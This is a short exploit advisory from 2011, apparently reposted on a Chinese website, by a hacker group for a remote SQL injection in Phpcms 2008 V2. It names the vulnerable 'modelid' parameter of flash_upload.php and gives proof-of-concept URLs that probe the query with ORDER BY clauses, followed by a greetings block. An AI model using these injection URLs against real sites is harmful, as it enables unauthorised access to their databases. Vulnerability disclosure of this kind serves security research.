Phpcms 2008 SQL注入漏洞

Tybe: REMOTE SQL iNJECTioN
Vendor: www.phpcms.cn

Software: Phpcms 2008 V2
author: ((R3d-D3v!L))

TEAM: Xp10_hACKEr & 403-T3AM

contact: X[at]hotmail.co.jp

Date: 17.jan.2011
T!ME: 05:15 am GMT
Home: WwW.XP10.COM
======================================================================================
# REMOTE SQL iNJECTioN Vulnerabilities
======================================================================================

[*] Err0r C0N50L3:


http://server/bbs/phpcms_th/flash_upload.php?modelid= EV!L INJECT!ON




[*] prove of concept =


http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+20--    (false)


http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+19--    (TruE)


Already Tested on Win Xp

[~]-----------------------------{((Xp10_hACkEr))}------------------------------------------------
#
#
[~] Greetz tO: [dolly &MERNA &po!S!ON Sc0rp!0N & ((hetlar jeddaH))  &(Nochelove) &emeliya & NEX ]
#
[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ #
#
[~] spechial thanks : ((HITLER JEDDAH & rootshell& DR.DAShER& abo shahd &abo mohammed)) ALL XP10 MEMbers #
#
[?]spechial SupP0RT : MY M!ND # �
#
[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((R3d D3v!L<---&--->JUPA<---aNd--->Devil ro0t)) #
#
[~]spechial FR!ND: XP10.COM -_-_- lurklife.com #
#
[~] !''M 4R48!4N 3XPL0!73R. #
#
[~]{[(D!R 4ll 0R D!E)]}; #
#
[~]---------------------------------------------------------------------------------------------

本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:https://www.yesck.com/post/421/

本文 暂无 评论

回复给

欢迎点评

联系我们

站长QQ:8117829

站长邮件:8117829@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code